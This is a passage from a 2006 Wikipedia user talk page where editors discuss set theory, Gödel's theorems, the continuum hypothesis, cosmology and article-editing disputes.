beholder. "A martyr to some" is fine though, do you agree? -- Heptor talk 10:01, 3 May 2006 (UTC) It's alright. I can't imagine how you can think the "attempt" wording is more neutral, though. It directly accuses Khodorkovsky's supporters of trying to manipulate perceptions. --Trovatore 14:24, 3 May 2006 (UTC) ## Godel So what was the reason for your reversion? -- PCE 01:57, 4 May 2006 (UTC) The fact that what I reverted, was nonsense --Trovatore 02:56, 4 May 2006 (UTC) Are you refering to Rucker's proof or to my refutation? -- PCE 03:39, 4 May 2006 (UTC) Perhaps you could explain instead why the following is nonsense: 1. Let x = 1. 2. Square both sides: x2 = 1 3. Subtract 1 from both sides: x2 – 1= 0 4. Factor: (x+1)(x-1) = 0 5. Divide both sides by (x-1): x+1 = 0 6. Substitute the value of x: 1 + 1 = 0 7. Conclusion: 2 = 0. -- PCE 03:53, 5 May 2006 (UTC) Yeah, I could. --Trovatore 03:54, 5 May 2006 (UTC) Okay. Good to see you are up. Thought I had stumped you with the above question about Rucker's proof or my refutation. -- PCE 03:57, 5 May 2006 (UTC) How about this: think of yourself as Gödel and answer the question as if you were him? -- PCE 15:55, 5 May 2006 (UTC) Okay, let's go on to something else... assuming that Gödel's Incompleteness Theorem only applies to the natural numbers does that mean it applies only to base 10? --- PCE 22:50, 5 May 2006 (UTC) This is a trivial question; if you really don't know the answer, then you need to spend a lot more time acquiring some basic background in logic and foundations of math before it will be a sensible use of time to discuss it with you. The other possibility is that you do know the answer, and are just trying to make trouble. Either way I don't see the point in responding further. --Trovatore 23:06, 5 May 2006 (UTC) Well part of the reason for the success of a wiki is that it serves as an opportunity for nubees to learn from experts even if the experts only suggest an article to read. But when an expert is so rude and arrogant that he deletes an edit without even so much as a referral, much less an explanation as to why he performed the deletion, then that expert is not conducive to donations of a finacial kind. Comprenda? -- PCE 23:33, 5 May 2006 (UTC) So you're holding Trov responsible for your unwillingness to make a monetary donation to the Wikimedia Foundation, because he didn't give you a reference to show that Gödel's incompleteness theorem is not dependent on the radix used to denote the natural numbers? What is this, extortion? -lethe talk + 00:56, 6 May 2006 (UTC) User_talk:Paul_August#Your_revertion..._G.C3.B6del_Incompleteness_Theorem -lethe talk + 02:10, 4 May 2006 (UTC) [email protected] seems like a troll to me. Do not feed the trolls. JRSpriggs 05:28, 6 May 2006 (UTC) JRSpriggs seems like an ostracist to me. -- PCE 13:41, 6 May 2006 (UTC) ## Wrongful and malicious deletion of talk pages on your part... When you deleted the talk topic: "PCE's doubts" you deleted the following commentary and other valuable points of discussion which although may not be of any value to you may be of value to others, if for no other reason than the amount of work and effort others have poured into them. See falsifiability for a crucial difference between the laws of physics and theorems in mathematics. The laws of physics are not "proved" in the same way that mathematical theorems are. Gödel's theorem applies, in the original version, to "Principia Mathematica", but there are many generalizations that apply to other axiomatic systems (such as ZFC) or other formal constructs (such as Turing machines). I am not sure where the borderline between Theoretical/Pure Mathematics and Applied Mathematics is precisely, but it seems clear that Gödel's theorem is a theorem of pure mathematics. Aleph4 16:54, 6 May 2006 (UTC) How about next time before you delete any discussion in which you are not an immediate participant reframe from such deletion until you have advised the actual participants what you intend to do. If you can not do that then how about surrendering your status as a fellow Wikipedian or start making a few financial contributions to help pay the bills. -- PCE 20:50, 8 May 2006 (UTC) I didn't delete it. I moved it to a new "arguments" subpage. --Trovatore 20:53, 8 May 2006 (UTC) I agree that moving the discussion to a subpage was a good idea, for the reason that Trovatore gave: Please reserve this page for discussions about improving the *article*. Really, such discussions should not be held on Wikipedia at all -- this is an encyclopedia, not a chat forum, nor a math class. But sometimes it is hard to resist. --Aleph4 21:54, 8 May 2006 (UTC) Okay. My apologies. The whole concept of a wiki is new to me since I have only recently begun to participate regularly in newsgroups (chat forums). I am now in the process of learning wiki protocols. Thanks for your head's up and for your reply. Again my apologies. -- PCE 17:36, 10 May 2006 (UTC) I am aware that you've previously turned down a nomination for adminship. I think you're a very valuable contributor and would make a useful addition to our phalanx of math admins. Adminship should probably be a matter of course for editors who've been productive and noncontroversial here as long as you. If you think you could manage to mostly ignore the addition of a few extra buttons to your wikipedia interface without having more time sucked up by the project than is already, I'd be happy to nominate you again (as would many others I'm sure). If nothing else, it might be expedient for dealing with new appearances of WAREL puppets. -lethe talk + 10:04, 11 May 2006 (UTC) PS did you take your username from the opera? -lethe talk + 10:05, 11 May 2006 (UTC) A troubadour with a rollback button, now that's will be intersting. Oleg Alexandrov (talk) 15:53, 11 May 2006 (UTC) Well, not just now; thanks, Lethe and Oleg. I've got a lot of things to think about right now, moving and changing jobs. BTW I don't know that particular opera per se; I like the name "Trovatore" because I'm an Italophile and like to sing. --Trovatore 02:59, 12 May 2006 (UTC) It's the opera that the famous Chorus of the Anvils is from. If operas are your thing, that's a good one. -lethe talk + 11:46, 12 May 2006 (UTC) ## Romano Prodi I copied your request for protection from WP:AN/I to WP:RPP, where you're likely to get a quicker response. AmiDaniel (talk) 23:34, 13 May 2006 (UTC) Thanks. --Trovatore 00:25, 14 May 2006 (UTC) ## Hi I understand, but the problem is that semiprotection isn't intended to prevent anons from editing content. Only to prevent them from vandalizing. At its heart, this is a content dispute between two anon users, so semiprotection doesn't apply. Hopefully this will encourage them to come to the talk page and discuss things. If that doesn't work quickly, I'll remove the protection. · Katefan0 (scribble)/poll 21:02, 15 May 2006 (UTC) OK, I understand; this is probably consonant with current policy. In my opinion the policy should be changed; anons should be allowed to make non-controversial edits, but once things become disputed, they should have to log in if they want to continue. It's frustrating to try to discuss things with ghosts. --Trovatore 21:08, 15 May 2006 (UTC) There is a guideline that sorta says as much; Wikipedia:Accountability. But of course, it's just a guideline, not an official policy. You may find it useful to try to guide the two anons to this page, though. Sometimes it's enough to convince people to sign up for accounts. · Katefan0 (scribble)/poll 23:27, 15 May 2006 (UTC) ## Crazy Mathematicians I am fascinated by the trajedies of some modern mathematicians - Cantor, Godel, Kacynski. I believe I sat next to Kacynski in the back of a Berkely classroom one day years ago. He was the assistant Professor auditing another's class; I was the flake flunking out. I was encouraged to see your recent post on the Georg Cantor discussion page - encouraged to beseige you with a Cantor question: What was Cantor's motive in using the Hebrew alphabet? I can see three plausabile answers...... Clarity - He wanted something not to be confused with all the other, mostly Greek, symbols. Homage - He WAS proud of his heritage and desired to acknowledge it. Ego - mentioned in my Cantor page post - He wanted to emphazisize the drama and significance of his theory by using one of the oldest alphabets, even older than Greek. Any clues about his motivations? --Therealhrw 17:45, 23 May 2006 (UTC) I'd just be speculating, and I'm not really very good at history. --Trovatore 17:54, 23 May 2006 (UTC) ## Cantor's diagonal argument Given a sequence of objections to Cantor's diagonal argument, can we construct an objection not in the sequence? -Dan 15:27, 24 May 2006 (UTC) Hmmm that depends. Can every objection be written as a finite list of symbols from a finite alphabet? Dmharvey 16:43, 24 May 2006 (UTC) Some are potentially infinite, I think you realize that. -Dan 18:40, 24 May 2006 (UTC) I apologize if I have annoyed you with my off-topic talk page ramblings. Incidentally if the posts immediately above this was also an issue, I assure you it was meant in fun. Cheers, -Dan 20:59, 26 May 2006 (UTC) No, no problem; I have no objection to general chattiness. I just think the discussion on that page is getting kind of long, and something should probably be done about it to reclaim the page for its intended purpose. But I wasn't annoyed, and no apology is necessary. --Trovatore 22:29, 26 May 2006 (UTC) ## Inaccessible cardinal axiom Not sure this is a standard name. Personally I wouldn't give it a name but would just call it "there exists a proper class of inaccessibles". The hierarchy of axioms is too finely divided to give every axiom a name (hard enough just keeping track of the large-cardinal properties). Anyway I've never heard this usage among set theorists. --Trovatore 03:33, 27 May 2006 (UTC) You know, I was just about to post a comment on User talk:JRSpriggs and ask him to comment on the actual usage of this axiom, but you'll do just as well. Anyway, I just read an informal paper which admitted that the axiom is not often used, and was arguing that it ought to be used. Actually, he's talking about the universe axiom' with that name, not the name inaccessible cardinal axiom. I can't comment on how much those names are used. Let me change the language a little and see how you like it. -lethe talk + 03:41, 27 May 2006 (UTC) I don't think it's so much "seldom used" as seldom called that. It's really a very weak axiom as these things go. I suppose it's adequate for category theorists who want only to talk about Grothendieck universes–provided all they want to prove in those universes, orthogonally to the Grothendieck–universe stuff itself, is what can be proved in ZFC. But what if you want more large–cardinal strength in the universes than that? The axiom of the form "there is a proper class of blank" that's currently of the most interest, I think, is the immensely stronger proposition "there is a proper class of Woodin cardinals". That's because that's about the minimum you need to make Ω-logic work sensibly. But of course that's off-topic in an article about inaccessibles, whereas the axiom you mention is not. And the axiom is true, of course. I'm just not sure it has enough separate importance to give it a highfalutin name; it's just a not-so-distinguished point in a very long and finely-divided hierarchy. --Trovatore 03:57, 27 May 2006 (UTC) Well, I understood that Grothendieck gave it a name, and I think that would be good enough, even if in modern set theory it's not very interesting. I'll admit that the paper wasn't crystal clear on that. Maybe Grothendieck only named the universe axiom and not the inaccessible cardinal axiom. In any case, do you have a suggestion? Excise the name altogether? But then what will we name the section header? -lethe talk + 04:15, 27 May 2006 (UTC) How about "A proper class of inaccessibles"? --Trovatore 04:30, 27 May 2006 (UTC) ## Re "New try at first para" Trov: can you say if my lastest suggestion for a new first paragraph at Talk: mathematics is acceptable to you? I'm trying to generate a consensus there. Thanks Paul August 18:49, 31 May 2006 (UTC) (P.S. nice new article on Suslin ;-) ## Large cardinal property Please check the new version of the first paragraph of Large cardinal property to make sure that it is correct. JRSpriggs 05:01, 8 June 2006 (UTC) Well, it's not worse than it was. On rereading it I'm a little concerned that it gives too much of an impression that this is an exact definition of large cardinal property (even though this is explicitly disclaimed later in the section). BTW I changed the all-caps to italics. --Trovatore 22:21, 8 June 2006 (UTC) Thanks for checking it. I felt that the old version was not as clear as it could be. I agree that the definition is not exact, but I do not see any better way of saying that than it already does. JRSpriggs 04:55, 10 June 2006 (UTC) ## Arithmetical and Borel hierarchies I edited Arithmetical hierarchy this morning. I saw in the talk that you were thinking of it in terms of classes of reals. I think that that meaning should go in the article Borel hierarchy which I am hoping to get to soon. —The preceding unsigned comment was added by CMummert (talkcontribs) 12:59, June 13, 2006. Hi Carl, I think the sets-of-reals meaning belongs in arithmetical hierarchy. It's the lightface counterpart to the Borel hierarchy, and it really is the same idea as for the sets of naturals. Just a little awkward to word. --Trovatore 13:28, 13 June 2006 (UTC) I agree that they are the same underlying idea. My hesitation is that the lightface Borel hierarchy (sets of reals) goes up to omega^{CK}_1 but the arithmetical hierarchy (sets of naturals) only goes to omega, so you can't count quantifiers in the lightface Borel hierarchy. My conception of the AH is closely tied to Post's theorem and counting quantifiers. I would appreciate your thoughts on how to arrange things, and I'll hold off the BH article for a while to think about it. (I apologize for forgetting to sign my previous comment.) CMummert 13:57, 13 June 2006 (UTC) I edited analytical hierarchy. What do you think of the general layout? Would a similar approach satisfy you for arithmetical hierarchy? CMummert 15:17, 13 June 2006 (UTC) ## "If" in definitions I did not see any contribution from you to the discussion about this topic which I initiated at Wikipedia_talk:WikiProject_Mathematics. However, since you are one of those who has changed "iff" to "if" in definitions, I would like to know what your justification is. I explained my position in the subsection I just added, Wikipedia_talk:WikiProject_Mathematics#Using a conditional rather than a biconditional in a definition is wrong. JRSpriggs 04:03, 20 June 2006 (UTC) Since I still find "if" offensive and you still find "if and only if" offensive, I am wondering whether we could agree on some third usage which is tolerable to both of us? For example, "means" or "is defined as". Would either of them be acceptable to you? JRSpriggs 05:25, 22 June 2006 (UTC) Heh, JRS and Trov trying to decide the fate of the world. :) As far as I am aware, 'if' is the standard, and I don't think anything can be done about it. :) Oleg Alexandrov (talk) 16:02, 22 June 2006 (UTC) ## Possible covariance matrices What are the restrictions on what matrices can be covariance matrices? I guess the matrix has to be symmetric; is any symmetric matrix a possible covariance matrix? --Trovatore 23:11, 19 June 2006 (UTC) I've now made the answer to this question into a new section in the article titled covariance matrix. The answer is that a matrix is a covariance matrix of a vector whose components are real-valued random variables if and only if it is a nonnegative-definite symmtric matrix with real entries. The proof involves a simple application of the finite-dimensional case of the spectral theorem. Michael Hardy 17:14, 22 June 2006 (UTC) I notice that your question, "is any symmetric matrix a possible covariance matrix?", is the easy part. That some such matrices are NOT covariance matrices follows quickly from one of the identities. But a point of rhetoric: Your question, "is any symmetric matrix a possible covariance matrix?" is ambiguous. It could mean "is there any symmetric matrix that is a possible covariance matrix?" or it could mean "is every symmetric matrix a possible covariance matrix?". Michael Hardy 17:17, 22 June 2006 (UTC) ## Thermodynamic temperature and absolute zero Discussion moved to talk:thermodynamic temperature; please continue there. --Trovatore 15:45, 12 July 2006 (UTC) ## vandalism Hi, I assume that you are not 87.29.89.217 (talk · contribs), so I took the liberty of reverting his/her edit to your page. If you have indeed become a native de/it speaker overnight, please accept my apologies. --Aleph4 09:55, 3 August 2006 (UTC) ## Photon in the box Il Trovatore, please sto restoring this section. This section is a disaster, it talks about entities long abandoned in SR (rest/relativistic mass), it has no experimental foundation, it has no references, it is contradicted by other articles in the same page, it looks like someone's pet college exercise and is not conform to wiki's definition. Please remove it and stop reverting it, it is an embarassmentAti3414 00:32, 8 August 2006 (UTC) ## Relativistic mass, rest mass If you want to hang on these outdated concepts, fine. If you want to use them as a means of propping up an even more ridiculous concept, the "photon in a box" exercise picked off the John Baez FAQ, this is fine too. If you want to apply the concepts to calculating the "mass" of a system of photons, fine with me as well. This is what makes wiki a joke when it comes to the relativity chapter. Ati3414 00:32, 8 August 2006 (UTC) ## Constants Hey, Sorry if you didn't like the definition I was used to, it's just the only one to which I was exposed. I am wondering what you mean when you say it's "useful" to keep it your way; they seem, to me, equivalent, and I just saw my version as being simpler. I probably haven't seen or worked with as much with logic as you have, so I was wondering if you could enlighten me. Also could you recommend a book or two? thanks, --Bernard the Varanid 01:08, 8 August 2006 (UTC) oh, also I should probably revert the similar change I made to List of first-order theories. I'll go do that now...--Bernard the Varanid 01:10, 8 August 2006 (UTC) Actually, on reflection I'm not so sure. I thought I remembered that constant symbols didn't make the Ehrenfeucht–Fraïssé game any more complicated, but function symbols did. But I'd have to think it through again and see if I was really right about that. --Trovatore 01:13, 8 August 2006 (UTC) I fail to see the utility of removing wikilinks. --Michael C. Price talk 20:03, 9 August 2006 (UTC) It's policy that you shouldn't link to the same article twice. In practice I think it's fine to repeat a link if the first link was much earlier in the article, to save people from scrolling up (see WP:SENSE and WP:IAR), but repeated identical links in the same short section are distracting and ugly. --Trovatore 20:08, 9 August 2006 (UTC) ## Stop reverting If you don't understand what you are dealing with then leave it alone, you are reverting back in antiscientific,antiquated POVs. Stick to your math, leave physics alone Ati3414 04:08, 10 August 2006 (UTC) ## Create arguments page at Photon Would you please create an arguments subpage at Talk:Photon and perhaps also Talk:Mass in special relativity as you did at Talk:Gödel's incompleteness theorems, and move all the back and forth with Ati3414 there. JRSpriggs 10:44, 13 August 2006 (UTC) Hmm, that thought had occurred to me, but the problem is that the material is not so cleanly separated. All the stuff about exercises and thought experiments should go into "Arguments", but it's interleaved with opinions about what should appear on the article page, which (tiresome as some of those opinions are) actually do belong on the talk page. In the Gödel case it was easier; there were whole sections that had dropped any pretense of being editorial. But if you feel like wading through it, go for it. There's nothing technically hard about it. --Trovatore 18:03, 13 August 2006 (UTC) How about a normal archiving then? The point is that the talk pages are much too long now. JRSpriggs 05:10, 14 August 2006 (UTC) ## Nice "sonnet" On my page, all things are sonnets No matter their number or phonics, I love them all, from half rhymes to triplets, } And anacoluthon will fit it. } So thanks I will extend to each of the wits } And laurels I profer with the right extended And, for the left, pray don't inspect it. (Nice use of the polysyllable, there....reminded me of TSE's "polyphiloprogenitive, the sapient sutlers of the Lord." Geogre 02:27, 17 August 2006 (UTC) The form, as you may know, is a double dactyl, and the hexasyllabic word is one of the requirements. Notwithstanding my favorite example, by Piet Hein, breaks that rule. I won't break his copyright, but I don't mind telling you who will: Go to this site and search for the word "grook". I once won a (notional, but Totally Official) sheep with one of these. Search for "Michael Ray Oliver" and "xerolocality". (Yes, I figured out later it should have been "xerilocality", but the officials didn't notice at the time.) --Trovatore 04:08, 17 August 2006 (UTC) ## Stop move of "Ordinal number" User:Salix alba is planning to move Ordinal number to another name. Please stop him. JRSpriggs 03:49, 4 September 2006 (UTC) ## Infinity and User:202.91.77.170 I am all over this one! HighInBC 03:48, 13 September 2006 (UTC) ## 12 / 0 = 0, says school division chart If evidence is found that there actually are schools which have sunk so low as to use this chart, it just might be worth a mention. -- Meni Rosenfeld (talk) 18:46, 2 August 2006 (UTC) It's actually highly educational. It's a good early lesson that grownups don't always know what they're talking about, and just because you see something on a laminated chart doesn't make it true. --Trovatore 18:50, 2 August 2006 (UTC) I looked at that web page, and I can't see anything on the chart that says 12/0 = 0. It's too small to read. How do you know it's there? Michael Hardy 20:29, 4 August 2006 (UTC) Save the image to disk, and blow it up in ImageMagick or Eye-of-gnome or whatever you use. --Trovatore 20:50, 4 August 2006 (UTC) Can you shed any light on how to do that? I looked at the html code for that page. I find various gif and jpg files, but none that appears to be that particular image. Michael Hardy 21:38, 19 September 2006 (UTC) Well, it's browser-dependent, but in Mozilla I just right-click it, and choose "Save image as..." --Trovatore 21:41, 19 September 2006 (UTC) Oh... right-clicking. I'm not used to that. Thanks. Michael Hardy 21:52, 19 September 2006 (UTC) Trovatore, your comments on my talk page (we should henceforth use the talk page on the Observable Universe article) concluded with "...There is likely a planet somewhere whose observable universe does not even include the Earth, so it obviously can't be the same as Earth's observable universe." This statement is true of billions of planets because electromagnetic radiation follows the inverse-square law. There exist objects in the observable universe sufficiently far from each other that the inverse-square law kills any radiation one observer might detect from the other observer. By your definition then, there are billions of planets that would be "outside of the observable universe." But the observable universe is not defined by observers that live on Earth but rather upon the maximum possible physical size the universe could be, based upon inflation models. Thus, the observable universe does indeed include billions of star systems that technically can't "see" each other but which still exist within the same observable universe. If, as the article contends, scientists mean "observable universe" when they say "universe" then we cannot define the observable universe as that space excluding observers that cannot see each other's radiation. Within the current experimentally-supported (i.e. WMAP, et. al.) cosmological models the observable universe is the universe and anything existing outside of our own space-time is irrelevant (physically, that is). For these reasons primarily I originally deleted the "ball-shaped region surrounding the Earth" comment in the intro back in June. Until we find a source that supports this claim of a preferential reference frame it would not make sense to go back to that definition. The current intro. para. on the O.U. page now reflects, with proper verifiable citations, the scientific definition of an observable universe without reference to a particular observer. I am happy to discuss your take on these ideas from your mathematical background. Perhaps we can find a way to improve the article further together. Cheers, Astrobayes 19:32, 25 September 2006 (UTC) There is no upper limit to "the physical size of the observable universe, based upon inflation models". It may well be infinite. Take a look at the responses to my questions at Wikipedia talk:WikiProject Physics, particularly those of Chris Hillman and JRSpriggs. As for the inverse square law, that has nothing to do with it. I'm not talking about whether the intensity of light would be too low to be observed, but whether the light could get there at all, given that it can't follow a spacelike path --Trovatore 19:56, 25 September 2006 (UTC) There is in fact an upper limit on the size of the universe and the sources I cited, which you deleted, again, explain this in very understandable terms. Three times now you have reverted a section that I put in, deleted its citations, and kept the same wording each edit - without citations to support what you've written. I have done a search to verify the edit you've made and I can not verify what you've edited with any source. According to the Wikipedia policy on verifiable sources, what you've written is therefore in dispute. Even if you can make a compelling personal case for why what you've put in the article might make sense, Wikipedia forbids original research, so there is therefore a burden on the editor (you) to cite references for what you've edited. I am therefore asking you, again, to kindly cite these sources because I'm exhausted at this debate and I'm ready to submit this article for arbitration. Again, the introductory paragraph in this article is not supported by any resource that I can find, be it scholarly article, periodical, or peer-reviewed journal. As it stands now it is physically confusing. In addition to this I would remind you that there is a three-revert rule in general here. So, neither you nor I can make another revert on this article until this matter is settled. Post your sources from where you obtained the phrase "ball-shaped region surrounding the observer." After an extensive search I find none that support such a definition of observable universe. You are stretching the limits of good faith here and I think it is time we get some arbitration on this article. Astrobayes 22:04, 25 September 2006 (UTC) As to the first source: I'd need a ScienceDirect password to get it; it's possible that I can do this through one of my university logins but I'm not going to try right now (I'm at work). Please quote the exact text that you think supports your case. As to the second: It flatly contradicts you. Note the second paragraph of the introduction: ...it is certainly possible that the Universe extends infinitely in each spatial direction... So there is, in fact, no upper limit imposed on the size of the (whole) universe by anything in current knowledge. --Trovatore 22:19, 25 September 2006 (UTC) FWIW I'm with Trovatore on this. There is no limitation on the possible size of the universe, which may be either finite or infinite. Astrobayes is making a number of other strange claims, such as the observable universe forming a ball shaped region implying a special reference frame: it doesn't imply anything of the sort: it is consequence of the shape of the future and past light cones. --Michael C. Price talk 01:18, 26 September 2006 (UTC) This is the problem... this "discussion" has become so entrenched in semantics and mathematics that my original edit I made to that article, the sources I cited, and the explanation I gave back in June (which have several times been deleted) are nothing like the statement in the preceeding paragraph. First and foremost, I am a physicist by education and training. And I am not attempting to make any strange claims. My problem with the original article was the statement, "...a ball-shaped region surrounding the Earth..." and my point was quite simply that we can define an observable universe without any mention of Earth, and there are strong arguments against an infinite universe in light of current observations. Period. And these are not my words; one great resource of many is to consult Misner, Thorne, and Wheeler's text on Gravitation, Chapter 27, pp.701+. The "Earth" bit has been removed from the article and I can live with that now. But my problem was always with putting the Earth as somehow important to define the reference frame for the observable universe, when doing so is not necessary; my problem was never with the spherical nature of the observable universe; in fact, relativity says it must be so. Since Wikipedia is an encyclopedia, for non-specialists, I was trying to stay away from technical arguments and all of the convoluted mathematics that subsequent discussions on this topic centered upon. Read the chapter I just cited in the M.T.W. text. You'll see that there are convincing physics arguments for having a universe with a finite radius. I appreciate that Trovatore and others are very skilled mathematicians. But a Ph.D. in set theory does not a physicist make. And I was simply trying to put aside all of my fancy education (we would all do well to do this when editing these articles) and instead read the article from a perspective of a curious youngster who had read a little on astronomy and physics in their local library. When I saw the "...region surrounding the Earth..." bit, my physics alarm went off. "This sounds like the celestial sphere," I said. Who cares where Earth is in all of this? If I were a youngster reading this in their local library I would be inclinded to ask, "Is not the observable universe the observable universe regardless whether we're in Andromeda, on Earth, or near Alpha Centauri?" So, I dug up some resources to help me answer that question, cited them, and they were promptly deleted (a good WP editor would have, instead of deleting them, moved them to the external links references, but that's another issue). I am also a scientist and I do concede that as we relax our assumptions on any model, our results can change. Perhaps the universe is indeed infinite (doing so presents some problems with energy, but see the M.T.W. text reference above). But since the article is on the observable universe, anything that can not be observed (read: any universe we make up in our heads that may or may not exist outside of the observable universe). is as irrelevant as choosing a particular point of observation and saying that the view from there is somehow special. Again, my problem was always with the "Earth at the center" bit, not the sphericity of the observable universe. With the "Earth" bit taken out of the article, I'm happy and I'll let the rest of it go. I would also like to say that both Trovatore and I have reached our revert limit on the article. Any further edits on that particular section by anyone else can not be reverted by either Trovatore or me, Astrobayes, as doing so would really be in poor trust of WP policy. Cheers, Astrobayes 17:59, 26 September 2006 (UTC) You posed the question: "Is not the observable universe the observable universe regardless whether we're in Andromeda, on Earth, or near Alpha Centauri?". The answer is no. PS I am a physicist not a mathematican. Reading MTW pg 750 I note the sentence "But today's view of cosmology, as dominated by Einstein's boundary condition of closure (k= +1) and his belief in ${\displaystyle \Lambda =0}$, need not be accepted on faith forever"..."Observational cosmology will ultimately confirm or destroy them". Observation has already rejected one of these two articles of faith. Now take the argument back to the appropriate talk page. --Michael C. Price talk 18:25, 26 September 2006 (UTC) "Oh bother" (well, somethign stronger). I was completely unaware of this - thanks for drawing this to my attention. I've started a discussion on it over at Wikipedia:WikiProject Mathematics. Tompw 15:13, 9 October 2006 (UTC) ## Re: Markup in section headers Sorry about that... I didn't realize it broke clickability. -- Moondigger 00:32, 17 October 2006 (UTC) ## "a monarchy is never a republic" er, that would be decidedly wrong. the presence of an executive heading one branch of a government occurs under a constitutional monarchy, such as what England, then Great Britain, had following the Revolution of 1688-89. reverted. Stevewk 15:28, 19 October 2006 (UTC) • hey, you're being ignorant. i buried my stuff in a footnote. ok, i'll have the Wiki guys step in. Stevewk 21:25, 19 October 2006 (UTC) ## Image copyright problem with Image:NiceBobKitty.jpg Thanks for uploading Image:NiceBobKitty.jpg. The image has been identified as not specifying the copyright status of the image, which is required by Wikipedia's policy on images. If you don't indicate the copyright status of the image on the image's description page, using an appropriate copyright tag, it may be deleted some time in the next seven days. If you have uploaded other images, please verify that you have provided copyright information for them as well. This is an automated notice by OrphanBot. For assistance on the image use policy, see Wikipedia:Media copyright questions. 07:09, 20 October 2006 (UTC) ## don't replace HTML by unicode please, could you stop making edits just to replace HTML to unicode, like in this edit ? on several pages it is explicitely mentioned that this should not be done. — MFH:Talk 23:29, 20 October 2006 (UTC) Markup should never be used in section headers (though simple wikilinks, that is with no colon at the start, are OK). This is because the edit summaries reflect the markup, and when you click on them, you don't get sent to the correct anchor. So I will continue to remove markup from section headers. --Trovatore 23:38, 20 October 2006 (UTC) ## Cardinalites and models Cardinality is an inherent and absolute property of each set (if the set exists). If two models disagree on cardinality of the same set, then at least one of the models is deficient (e.g. countable model of real numbers according to the Skolem-Lowenheim theorem, which does not satisfy the Least-upper-bound axiom). Leocat 18:36, 21 October 2006 (UTC) Which is relevant how to what I said? This is what I wrote: so what you wrote at continuum hypothesis is kind of a natural mistake, but still wrong. I'm guessing you're thinking of CH as saying "there is no set of reals of cardinality strictly between that of the naturals and that of the reals", and so you'd think if you have more sets of reals, then you have more chance to find such a set. What you're missing is that the smaller model and the larger one may not agree on whether a given set of reals has the same cardinality as R. Given a fixed set of reals X that's in both models, it's the larger model that might have a bijection between X and R, when the smaller one doesn't. It actually works in exactly the opposite direction from what you might have thought. If N and M are two transitive models of ZFC both containing all the reals, with N contained in M, then if N satisfies CH, then M must also satisfy CH. But the reverse is not true. --Trovatore 06:48, 20 October 2006 (UTC) Now, in the above case, obviously N is "deficient" (if it disagrees with M about CH). N fails to have a witness that the cardinality of the reals is ${\displaystyle \aleph _{1}}$; that witness shows up in M. And in that case, CH is really true. But that doesn't falsify anything I said. --Trovatore 18:50, 21 October 2006 (UTC) But what if CH is false? Then the richer model may have a witness to ${\displaystyle \aleph _{1}}$ < continuum. (By the way, the Freiling's axiom of symmetry looks pretty convincing to me. What do you think about it?) Leocat 19:20, 21 October 2006 (UTC) What do you mean by a witness that CH is false? I can imagine a witness that CH is true -- a well-ordering of the real numbers together with injections from each of its proper initial segments into the natural numbers. But what would your witness be? JRSpriggs 09:59, 22 October 2006 (UTC) A construction (or at least a proof of existence) of a set whose cardinality is strictly between ${\displaystyle \aleph _{0}}$ and continuum would be such a witness. This has been the problem in the research on CH so far, not establishing the cardinality of a set. Therefore it is natural to consider models containing certain subsets of R and enough functions to establish their cardinality. Leocat 17:03, 23 October 2006 (UTC) Leocat, you still don't seem to have come to terms with the fact that "having cardinality between ${\displaystyle \aleph _{0}}$ and the continuum" is not a property that's preserved upwards from a smaller model to a bigger one. The reason is that the larger model may have a bijection between the set in question and the continuum, that the smaller model lacks. Whereas the property "being a bijection between ${\displaystyle \aleph _{1}}$ and the continuum" is preserved upwards, between models that have the same reals. (It's not obvious, but is true, that if they have the same reals, then they also have the same ${\displaystyle \aleph _{1}}$). --Trovatore 17:27, 23 October 2006 (UTC) You should realize that your model may fail to establish "having cardinality between ${\displaystyle \aleph _{0}}$ and the continuum", but having such cardinality is an absolute property of a set - either it has it, or it does not. So you need a model that is rich enough to let you establish either existence of a set with such a cardinality, or a contradiction caused by the assumption that such a set exists. You keep mentioning models that do not let you establish certain bijections, while this has not been the problem in the history of research on CH. You have not answered my question about Freiling's axiom of symmetry. Leocat 14:27, 24 October 2006 (UTC) 1. "Either the set has it, or it does not", in the sense that every mathematical proposition is either true or false, yes. But that doesn't help in this context. It's not an "absolute property" in the usual technical meaning of "absolute", which is that different models (restricted to a context-dependent collection of such models) agree on the property. 2. Models do not "establish" anything, in the usual sense of the word "establish". Propositions are true or false in models; they are established (that is, proven), or refuted, in theories. Your use of language is a bit sloppy here. You need to distinguish carefully between syntax (theories) and semantics (models). 3. Research on CH has moved on a bit from what you may know about it. Yes, the early work was about trying out various kinds of definable sets -- open sets, perfect sets, Borel sets -- and seeing if they could be of intermediate cardinality. Basically the answer to all those questions is "no" -- all sets "like that", in a sense I won't get into now, are either countable or have the cardinality of the continuum. That doesn't really help much in trying to figure out whether a radically undefinable set might have intermediate cardinality. 4. Freiling's argument is interesting, but not convincing to me personally. Things like probabilities and measures don't work well with arbitrary, non-definable sets; Banach-Tarski is a good example of this. In fact Freiling admits that it's an argument not just against CH, but also against AC; since AC is obviously true in the full universe of sets, there must be something wrong with the argument in that context. --Trovatore 16:03, 24 October 2006 (UTC) Would you enlighten me why Freiling's argument is an argument against AC? Leocat 18:18, 24 October 2006 (UTC) I don't actually remember that (assuming I actually knew it at one point). But you can look up Freiling's article in the JSL, or one of the famous Penelope Maddy papers, "Believing the Axioms, I" and "Believing the Axioms, II". --Trovatore 05:32, 25 October 2006 (UTC) ## measurable functions not closed under composition Hi Trovatore, nice to meet you. Thanks for your thoughtful answer to my HelpDesk question on measureomorphisms last month. (Unfortunately it's out of reach now, the page has only more recent questions) I just put a comment on talk page of Measurable function, and hope it's ok I referenced what you said. Now I'm honestly wondering if they are actually closed under comp., but I've experienced many times apparently obvious reasoning blown away by something tricky when set or measure theory is involved. Regards,Rich 10:12, 4 November 2006 (UTC) ## Kolmogorov complexity Could you please have a look at that article. I am particularly concerned about the recently inserted picture of the Mandelbrot set. See my remark on the talk page. Although models of computation over the reals have been developed (e.g. by Smale, Shub, Blum and others) Kolomogorov complexity as dealt in this article concerns objects which are explictly encoded by finite bitstrings (Remark: what an encoding is for elements of a class of objects, is itself not entirely trivial. I think of an encoding as analogous to a chart on manifold; here two charts φ ψ are equivalent iff the overlap function φ ψ-1 belongs to some computational class such as PT.) In any case, I don't see how one can consider a class subsets of the plane large enough to include the Mandelbrot set as being encoded by finite bitstrings. I am aware that some very special classes iteratively defined fractals can be encoded by finite bitsrings, but it's not clear to me how that applies here. In any case, I am very tried of the endless argumentation on WP.--CSTAR 18:33, 4 November 2006 (UTC) ## Probability-based strategy AfD Just a note to let you know that I have nominated the article you have edited, or expressed interest in, for deletion. See Wikipedia:Articles for deletion/Probability-based strategy Pete.Hurd 05:29, 7 November 2006 (UTC) ## 12/0 = 0, bis Since you participated in the discussion at talk:division by zero about the chart being sold by an 